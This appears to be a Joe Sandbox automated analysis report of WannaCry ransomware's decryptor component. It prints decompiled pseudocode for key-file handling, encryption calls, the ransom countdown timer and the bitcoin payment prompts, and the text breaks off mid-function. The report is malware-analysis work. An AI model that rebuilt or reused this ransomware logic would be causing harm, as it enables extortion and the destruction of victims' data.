                                  					_v2196 = 0;
                                  					memset( &_v2192, 0, 0x21 << 2);
                                  					_t68 = fopen("00000000.res", "rb"); // executed
                                  					_t143 = _t68;
                                  					_t166 = _t164 + 0x14;
                                  					__eflags = _t143;
                                  					if(_t143 != 0) {
                                  						fread( &_v2196, 0x88, 1, _t143); // executed
                                  						fclose(_t143); // executed
                                  						_v2332 = 0;
                                  						memset( &_v2328, 0, 0x21 << 2);
                                  						sprintf( &_v2364, "%08X.res",  *((intOrPtr*)(_t154 + 0xa4)));
                                  						_t76 = fopen( &_v2364, "rb"); // executed
                                  						_t146 = _t76;
                                  						_t169 = _t166 + 0x34;
                                  						__eflags = _t146;
                                  						if(_t146 != 0) {
                                  							fread( &_v2332, 0x88, 1, _t146); // executed
                                  							fclose(_t146);
                                  							_t131 =  *0x421798; // 0x0
                                  							_v2060 = _t131;
                                  							memset( &_v2059, 0, 0x1ff << 2);
                                  							asm("stosw");
                                  							asm("stosb");
                                  							sprintf( &_v2396, "%08X.eky",  *((intOrPtr*)(_t154 + 0xa4)));
                                  							_t83 = fopen( &_v2396, "rb"); // executed
                                  							_t149 = _t83;
                                  							_t172 = _t169 + 0x34;
                                  							__eflags = _t149;
                                  							if(_t149 != 0) {
                                  								_t85 = fread( &_v2060, 1, 0x800, _t149); // executed
                                  								fclose(_t149);
                                  								_t39 = _t100 + 0x242; // 0x19fd56
                                  								_t40 = _t100 + 0x1de; // 0x19fcf2
                                  								E0040BE90("s.wnry", _t40, _t39);
                                  								_t88 =  *0x42189c; // 0x19f608
                                  								_push( *((intOrPtr*)(_t154 + 0x20)));
                                  								_push( &_v2540);
                                  								_push( *((intOrPtr*)(_t88 + 0x818)));
                                  								_push( *((intOrPtr*)(_t88 + 0x81c)));
                                  								_t46 = _t100 + 0xb2; // 0x19fbc6
                                  								_push(_t85);
                                  								_push( &_v2060);
                                  								_push(_v2324);
                                  								_push( &_v2332);
                                  								_push( &_v2196);
                                  								_push(_t100 + 0xe4);
                                  								_t91 = E0040C240( &_v2332, __eflags);
                                  								_t172 = _t172 + 0x4c;
                                  								_t83 = E0040C670();
                                  								__eflags = _t91;
                                  								if(_t91 >= 0) {
                                  									E00404640( &_v2436);
                                  									_v4 = 1;
                                  									_t94 = E004047C0( &_v2436,  &_v2468,  &_v2540);
                                  									__eflags = _t94;
                                  									if(_t94 == 0) {
                                  										 *(_t154 + 0xa8) = 1;
                                  									} else {
                                  										 *(_t154 + 0xa8) = 2;
                                  									}
                                  									_v4 = 0xffffffff;
                                  									_t123 =  &_v2436;
                                  									goto L15;
                                  								}
                                  							} else {
                                  								 *(_t154 + 0xa8) = 0xffffffff;
                                  							}
                                  						} else {
                                  							 *(_t154 + 0xa8) = 0xffffffff;
                                  						}
                                  					} else {
                                  						 *(_t154 + 0xa8) = _t157;
                                  					}
                                  				} else {
                                  					E00404640( &_v2508);
                                  					_v4 = 0;
                                  					if(E004047C0( &_v2508,  &_v2468,  &_v2540) == 0) {
                                  						_t97 = DeleteFileA( &_v2540);
                                  						_v4 = _t157;
                                  						E00404690(_t97,  &_v2508);
                                  						goto L4;
                                  					} else {
                                  						 *(_t154 + 0xa8) = 2;
                                  						_v4 = _t157;
                                  						_t123 =  &_v2508;
                                  						L15:
                                  						_t83 = E00404690(_t94, _t123);
                                  					}
                                  				}
                                  				 *[fs:0x0] = _v12;
                                  				return _t83;
                                  			}

                                  APIs
                                  • sprintf.MSVCRT ref: 00401323
                                  • sprintf.MSVCRT ref: 00401339
                                  • GetFileAttributesA.KERNELBASE(?), ref: 00401343
                                  • DeleteFileA.KERNEL32(?), ref: 0040139A
                                  • fread.MSVCRT ref: 00401405
                                  • fclose.MSVCRT ref: 00401408
                                  • sprintf.MSVCRT ref: 00401440
                                  • fopen.MSVCRT ref: 00401453
                                    • Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A
                                  • fopen.MSVCRT ref: 004013D5
                                    • Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658
                                    • Part of subcall function 004047C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000001,00000200,?,?,?,00000001,?,0019FA30), ref: 004048DB
                                    • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: sprintf$CriticalDeleteFileSectionfopen$AttributesCryptEncryptInitialize_local_unwind2fclosefread
                                  • String ID: %08X.dky$%08X.eky$%08X.pky$%08X.res$00000000.res$s.wnry
                                  • API String ID: 2787528210-4016014174
                                  • Opcode ID: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                  • Instruction ID: 5d668cda142e4e69bdcb8de65b1bf6b3866dc1aa9a0cfc7ced8feefa58b75360
                                  • Opcode Fuzzy Hash: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                  • Instruction Fuzzy Hash: 8A71BFB1104741AFD320DB60CC85FEBB3E9ABC4310F404A3EE59A87290EB78A4498B56
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 201 4076a0-4076d5 202 4076d9-407714 time 201->202 203 407716-40771c 202->203 204 40771e 202->204 205 407724-40773b 203->205 204->205 206 40775b 205->206 207 40773d-407745 205->207 210 40775f-407761 206->210 208 407747-40774d 207->208 209 40774f 207->209 213 407753-407755 208->213 209->213 211 407763-40776b 210->211 212 40776d 210->212 214 407771-407819 sprintf 211->214 212->214 213->210 215 407757-407759 213->215 216 407828-407832 214->216 217 40781b-407826 214->217 215->210 218 407833-40783c call 405180 216->218 217->218 221 407842-407892 SendMessageA * 2 #540 218->221 222 4076d7 218->222 223 4078a0-4078a8 221->223 224 407894-407896 221->224 222->202 225 4078aa-4078d9 _ftol #2818 * 2 223->225 226 4078db-40790e #2818 * 2 223->226 224->223 227 407911-40793e #3092 #6199 225->227 226->227 228 407990-4079bc #800 227->228 229 407940-407950 call 4079c0 227->229 229->228 232 407952-40798b InvalidateRect call 405920 * 2 229->232 232->228
                                  C-Code - Quality: 63%
                                  			E004076A0(void* __ecx) {
                                  				intOrPtr _t89;
                                  				char _t90;
                                  				intOrPtr _t91;
                                  				signed int _t94;
                                  				intOrPtr _t98;
                                  				signed int _t99;
                                  				intOrPtr _t125;
                                  				signed int _t133;
                                  				void* _t136;
                                  				intOrPtr _t139;
                                  				signed int _t143;
                                  				signed int _t147;
                                  				void* _t148;
                                  				intOrPtr _t161;
                                  				signed int _t192;
                                  				intOrPtr _t193;
                                  				signed int _t196;
                                  				signed int _t197;
                                  				signed int _t198;
                                  				intOrPtr _t200;
                                  				intOrPtr _t202;
                                  				void* _t204;
                                  				intOrPtr _t206;
                                  				void* _t207;
                                  				void* _t208;
                                  				void* _t209;
                                  				void* _t210;
                                  				void* _t211;
                                  				void* _t213;
                                  				long long _t225;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413EBB);
                                  				_t89 =  *[fs:0x0];
                                  				_push(_t89);
                                  				 *[fs:0x0] = _t206;
                                  				_t207 = _t206 - 0x8c;
                                  				_t196 = 0;
                                  				_t136 = __ecx;
                                  				 *((intOrPtr*)(_t207 + 0x14)) = 0;
                                  				 *((intOrPtr*)(_t207 + 0x18)) = 0;
                                  				 *(_t207 + 0x1c) = 0;
                                  				 *(_t207 + 0x20) = 0;
                                  				_t204 = 0;
                                  				L2:
                                  				__imp__time(_t196);
                                  				_t139 = M00421120; // 0x30303b30
                                  				_t161 = _t89;
                                  				_t90 = "00;00;00;00"; // 0x303b3030
                                  				 *((intOrPtr*)(_t207 + 0x40)) = _t139;
                                  				 *(_t207 + 0x3c) = _t90;
                                  				_t91 =  *0x421124; // 0x30303b
                                  				 *((intOrPtr*)(_t207 + 0x44)) = _t91;
                                  				_t208 = _t207 + 4;
                                  				 *(_t208 + 0x24) = _t196;
                                  				memset(_t208 + 0x44, 0, 0x16 << 2);
                                  				_t209 = _t208 + 0xc;
                                  				if(_t204 != 0) {
                                  					_t94 =  *(_t136 + 0x580);
                                  				} else {
                                  					_t94 =  *(_t136 + 0x57c);
                                  				}
                                  				_t98 =  *((intOrPtr*)(_t136 + 0x578));
                                  				_t143 = _t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4) * 8 << 7;
                                  				if(_t161 <= _t98) {
                                  					_t99 =  *(_t209 + 0x24);
                                  				} else {
                                  					_t133 = _t98 - _t161 + _t143;
                                  					_t196 = _t133;
                                  					if(_t196 <= 0) {
                                  						_t99 =  *(_t209 + 0x24);
                                  					} else {
                                  						asm("cdq");
                                  						_t99 = _t133 * 0x64 / _t143;
                                  					}
                                  					if(_t196 < 0) {
                                  						_t196 = 0;
                                  					}
                                  				}
                                  				if(_t204 != 0) {
                                  					 *(_t209 + 0x20) = _t99;
                                  				} else {
                                  					 *(_t209 + 0x14) = _t196;
                                  					 *(_t209 + 0x1c) = _t99;
                                  				}
                                  				 *(_t209 + 0x2e) = ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10) + ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10 >> 0x1f);
                                  				_t147 =  *(_t209 + 0x2e) & 0x0000ffff;
                                  				_t197 = _t196 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4) * 8 << 7);
                                  				 *(_t209 + 0x30) = ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb) + ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb >> 0x1f);
                                  				_t192 =  *(_t209 + 0x30) & 0x0000ffff;
                                  				_t198 = _t197 + _t192 * 0xfffff1f0;
                                  				 *(_t209 + 0x32) = ((0x88888889 * _t198 >> 0x20) + _t198 >> 5) + ((0x88888889 * _t198 >> 0x20) + _t198 >> 5 >> 0x1f);
                                  				sprintf(_t209 + 0x48, "%02d;%02d;%02d;%02d", _t147, _t192,  *(_t209 + 0x32) & 0x0000ffff, _t198 +  ~((( *(_t209 + 0x32) & 0x0000ffff) << 4) - ( *(_t209 + 0x32) & 0x0000ffff)) * 4);
                                  				_t207 = _t209 + 0x18;
                                  				if(_t204 != 0) {
                                  					_t148 = _t136 + 0x444;
                                  					_push(_t207 + 0x38);
                                  				} else {
                                  					_push(_t207 + 0x38);
                                  					_t148 = _t136 + 0x3c8;
                                  				}
                                  				_t89 = E00405180(_t148);
                                  				_t204 = _t204 + 1;
                                  				if(_t204 < 2) {
                                  					_t196 = 0;
                                  					goto L2;
                                  				}
                                  				SendMessageA( *(_t136 + 0x140), 0x402,  *(_t207 + 0x1c), 0); // executed
                                  				SendMessageA( *(_t136 + 0x1c4), 0x402,  *(_t207 + 0x20), 0); // executed
                                  				L00412DA6();
                                  				 *(_t207 + 0xa4) = 0;
                                  				_t225 =  *((intOrPtr*)(_t136 + 0x584));
                                  				if( *((intOrPtr*)(_t207 + 0x14)) <= 0) {
                                  					_t225 = _t225 + st0;
                                  					 *(_t136 + 0x818) = 1;
                                  				}
                                  				_t124 =  *((intOrPtr*)(_t136 + 0x588));
                                  				if(_t124 != 0) {
                                  					 *((long long*)(_t207 + 0x14)) = _t225;
                                  					_t200 =  *((intOrPtr*)(_t207 + 0x18));
                                  					_t193 =  *((intOrPtr*)(_t207 + 0x14));
                                  					_push(_t200);
                                  					_push(_t193);
                                  					_t124 = _t136 + 0x81c;
                                  					_push("%.1f BTC");
                                  					_push(_t136 + 0x81c);
                                  					L00412E00();
                                  					_t210 = _t207 + 0x10;
                                  					_push(_t200);
                                  					_push(_t193);
                                  					_push("Send %.1f BTC to this address:");
                                  					_push(_t210 + 0x10);
                                  					L00412E00();
                                  					_t211 = _t210 + 0x10;
                                  				} else {
                                  					L0041304A();
                                  					_t202 = _t124;
                                  					_push(_t202);
                                  					_push("$%d");
                                  					_push(_t136 + 0x81c);
                                  					L00412E00();
                                  					_t213 = _t207 + 0xc;
                                  					_push(_t202);
                                  					_push("Send $%d worth of bitcoin to this address:");
                                  					_push(_t213 + 0x10);
                                  					L00412E00();
                                  					_t211 = _t213 + 0xc;
                                  				}
                                  				_push( *((intOrPtr*)(_t211 + 0x10)));
                                  				_push(0x402);
                                  				L00412CE6();
                                  				L00412CE0(); // executed
                                  				_t125 =  *((intOrPtr*)(_t136 + 0x824));
                                  				 *((intOrPtr*)(_t136 + 0x824)) = 0x121284;
                                  				if(_t125 != 0x121284) {
                                  					E004079C0(_t136);
                                  					_t125 =  *((intOrPtr*)(_t211 + 0xac));
                                  					if(_t125 != 0) {
                                  						InvalidateRect( *(_t136 + 0x20), 0, 1);
                                  						_push( *((intOrPtr*)(_t136 + 0x824)));
                                  						E00405920(_t136 + 0x3c8,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
                                  						_push( *((intOrPtr*)(_t136 + 0x824)));
                                  						_t125 = E00405920(_t136 + 0x444,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
                                  					}
                                  				}
                                  				 *((intOrPtr*)(_t211 + 0xa4)) = 0xffffffff;
                                  				L00412CC2();
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t211 + 0x9c));
                                  				return _t125;
                                  			}


                                  APIs
                                  • time.MSVCRT ref: 004076DA
                                  • sprintf.MSVCRT ref: 0040780E
                                  • SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
                                  • SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
                                  • #540.MFC42 ref: 00407876
                                  • _ftol.MSVCRT ref: 004078AA
                                  • #2818.MFC42(?,$%d,00000000), ref: 004078BE
                                  • #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
                                  • #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
                                  • #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
                                  • #3092.MFC42(00000402,?), ref: 0040791D
                                  • #6199.MFC42(00000402,?), ref: 00407924
                                  • InvalidateRect.USER32(?,00000000,00000001,00000402,?), ref: 0040795A
                                  • #800.MFC42 ref: 0040799F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2818$MessageSend$#3092#540#6199#800InvalidateRect_ftolsprintftime
                                  • String ID: $%d$%.1f BTC$%02d;%02d;%02d;%02d$00;00;00;00$Send $%d worth of bitcoin to this address:$Send %.1f BTC to this address:
                                  • API String ID: 993288296-3256873439
                                  • Opcode ID: 7ae64adea42d893420969a4f625596c19cd741f426776df1d4eb6bd519e7d9e8
                                  • Instruction ID: 9b53b323f570066dafa0cf34324f53a17123da88a1e7ff32529d6bfb7c89d06c
                                  • Opcode Fuzzy Hash: 7ae64adea42d893420969a4f625596c19cd741f426776df1d4eb6bd519e7d9e8
                                  • Instruction Fuzzy Hash: 3281D4B1A043019BD720DF18C981FAB77E9EF88700F04893EF949DB395DA74A9058B96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 84%
                                  			E004060E0(intOrPtr __ecx, intOrPtr _a4) {
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v44;
                                  				struct HINSTANCE__* _t82;
                                  				struct HICON__* _t83;
                                  				intOrPtr _t119;
                                  				intOrPtr _t124;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413E0B);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t124;
                                  				_push(__ecx);
                                  				_t119 = __ecx;
                                  				_push(_a4);
                                  				_push(0x66);
                                  				_v16 = __ecx;
                                  				L00412C92();
                                  				_v12 = 0;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx + 0x60)) = 0x415a58;
                                  				_v12 = 1;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx + 0xa0)) = 0x416538;
                                  				_v12 = 2;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx + 0xe0)) = 0x416538;
                                  				_v12 = 3;
                                  				E004085C0(__ecx + 0x120);
                                  				_v12 = 4;
                                  				E004085C0(__ecx + 0x1a4);
                                  				_v12 = 5;
                                  				E00404090(__ecx + 0x228);
                                  				_v12 = 6;
                                  				E00404090(__ecx + 0x290);
                                  				_v12 = 7;
                                  				E00404090(__ecx + 0x2f8);
                                  				_v12 = 8;
                                  				E00404090(__ecx + 0x360);
                                  				_v12 = 9;
                                  				E00405000(__ecx + 0x3c8);
                                  				_v12 = 0xa;
                                  				E00405000(__ecx + 0x444);
                                  				_v12 = 0xb;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx + 0x4c0)) = 0x416478;
                                  				_v12 = 0xc;
                                  				L00412DA6();
                                  				_v12 = 0xd;
                                  				L00412DA6();
                                  				_v12 = 0xe;
                                  				L00412DA6();
                                  				_v12 = 0xf;
                                  				L00412DA6();
                                  				 *((intOrPtr*)(__ecx + 0x834)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x830)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x83c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x844)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x84c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x854)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x850)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x85c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x864)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x86c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x874)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x87c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x878)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x884)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x880)) = 0x415a30;
                                  				_v12 = 0x1b;
                                  				_t82 = E00407640(__ecx + 0x888);
                                  				 *((intOrPtr*)(__ecx + 0x888)) = 0x415a30;
                                  				 *((intOrPtr*)(__ecx + 0x894)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x890)) = 0x415a30;
                                  				_push(0x421798);
                                  				_v12 = 0x1d;
                                  				 *((intOrPtr*)(__ecx)) = 0x4163a0;
                                  				L00412DA0();
                                  				_push(0x421798);
                                  				L00412DA0();
                                  				_push(0x421798);
                                  				L00412DA0();
                                  				L00412E5A();
                                  				_push(0x80);
                                  				_push(0xe);
                                  				L00412F2C();
                                  				_t83 = LoadIconA(_t82, 0x80); // executed
                                  				_push(0x421798);
                                  				 *(_t119 + 0x82c) = _t83;
                                  				 *((intOrPtr*)(_t119 + 0x824)) = 0;
                                  				 *((intOrPtr*)(_t119 + 0x828)) = 0;
                                  				 *((intOrPtr*)(_t119 + 0x818)) = 0;
                                  				L00412DA0();
                                  				 *((intOrPtr*)(_t119 + 0x820)) = 0;
                                  				 *[fs:0x0] = _v44;
                                  				return _t119;
                                  			}

                                  APIs
                                  • #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                  • #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                  • #567.MFC42(00000066,00000000), ref: 0040612F
                                  • #567.MFC42(00000066,00000000), ref: 00406147
                                    • Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                    • Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                    • Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
                                    • Part of subcall function 004085C0: KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                    • Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
                                    • Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667
                                    • Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                    • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                    • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                    • Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
                                    • Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
                                    • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                    • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                    • Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
                                    • Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032
                                  • #567.MFC42(00000066,00000000), ref: 004061DF
                                  • #540.MFC42(00000066,00000000), ref: 004061F7
                                  • #540.MFC42(00000066,00000000), ref: 00406209
                                  • #540.MFC42(00000066,00000000), ref: 00406219
                                  • #540.MFC42(00000066,00000000), ref: 00406229
                                  • #860.MFC42(00421798,00000066,00000000), ref: 004062F7
                                  • #860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
                                  • #860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
                                  • #1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
                                  • #1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
                                  • LoadIconA.USER32(00000000,00000080), ref: 0040632F
                                  • #860.MFC42(00421798), ref: 00406358
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #540#567$#860Color$Load$Cursor$#1146#1168#324#341#6140#858CallbackDispatcherIconUser
                                  • String ID: 0ZA$0ZA$0ZA$DZA
                                  • API String ID: 3237077636-3729005435
                                  • Opcode ID: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                  • Instruction ID: 094c42c2691411c2b0867f220185f46eb880b1852b80e7f1edf951ce12ca3c27
                                  • Opcode Fuzzy Hash: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                  • Instruction Fuzzy Hash: 6261E970544B419ED364EF36C5817DAFBE4BF95304F40891EE1EA82281DFB86149CFAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 64%
                                  			E00406AE0(void* __ecx) {
                                  				char _v4;
                                  				char _v12;
                                  				char _v24;
                                  				char _v28;
                                  				intOrPtr _v36;
                                  				char _v40;
                                  				void* _v280;
                                  				char _v284;
                                  				char _v288;
                                  				char _v292;
                                  				void* _v296;
                                  				char _v300;
                                  				intOrPtr _v304;
                                  				char _v308;
                                  				void* _v312;
                                  				void* _v316;
                                  				char** _t26;
                                  				long _t30;
                                  				void* _t31;
                                  				char** _t32;
                                  				void* _t56;
                                  				intOrPtr _t58;
                                  				void* _t60;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413E61);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t58;
                                  				_t56 = __ecx;
                                  				L00412DA6();
                                  				_t26 =  &_v284;
                                  				_push(_t26);
                                  				_v4 = 0;
                                  				L00412DD6(); // executed
                                  				_push("msg\\");
                                  				L00412CAA();
                                  				_push("m_%s.wnry");
                                  				_push(_t26);
                                  				_push( &_v288);
                                  				_v12 = 1;
                                  				L00412CCE();
                                  				sprintf( &_v292,  *_t26, _v304);
                                  				_t60 = _t58 - 0x110 + 0xc;
                                  				L00412CC2();
                                  				_v24 = 0;
                                  				L00412CC2();
                                  				_t30 = GetFileAttributesA( &_v292); // executed
                                  				if(_t30 == 0xffffffff) {
                                  					_push("msg\\");
                                  					L00412CAA();
                                  					_push("m_%s.wnry");
                                  					_push(_t30);
                                  					_t32 =  &_v300;
                                  					_v28 = 2;
                                  					_push(_t32);
                                  					L00412CCE();
                                  					sprintf( &_v308,  *_t32, "English");
                                  					_t60 = _t60 + 0xc;
                                  					L00412CC2();
                                  					_v40 = 0;
                                  					L00412CC2();
                                  				}
                                  				_t31 = E00406CF0(_t56,  &_v292);
                                  				_v28 = 0xffffffff;
                                  				L00412CC2();
                                  				 *[fs:0x0] = _v36;
                                  				return _t31;
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#537#924sprintf$#3874#540AttributesFile
                                  • String ID: English$m_%s.wnry$msg\
                                  • API String ID: 3713669620-4206458537
                                  • Opcode ID: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                  • Instruction ID: 3ad7a17867ea9436e9d42ea8b12d154e8c58dea708134770199309aae3637b36
                                  • Opcode Fuzzy Hash: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                  • Instruction Fuzzy Hash: 4A316170108341AEC324EB25D941FDE77A4BBA8714F404E1EF59AC32D1EB789558CAA7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 94%
                                  			E00405A60(void* __ecx) {
                                  				char _v8;
                                  				intOrPtr _v16;
                                  				char _v24;
                                  				char _v32;
                                  				char _v40;
                                  				char _v48;
                                  				char _v56;
                                  				char _v64;
                                  				char _v72;
                                  				char _v80;
                                  				char _v88;
                                  				char _v96;
                                  				char _v104;
                                  				char _v112;
                                  				char _v120;
                                  				void* _v140;
                                  				void* _v928;
                                  				void* _v932;
                                  				void* _v936;
                                  				void* _v1000;
                                  				char _v1124;
                                  				char _v1248;
                                  				char _v1352;
                                  				char _v1456;
                                  				char _v1560;
                                  				char _v1664;
                                  				char _v1796;
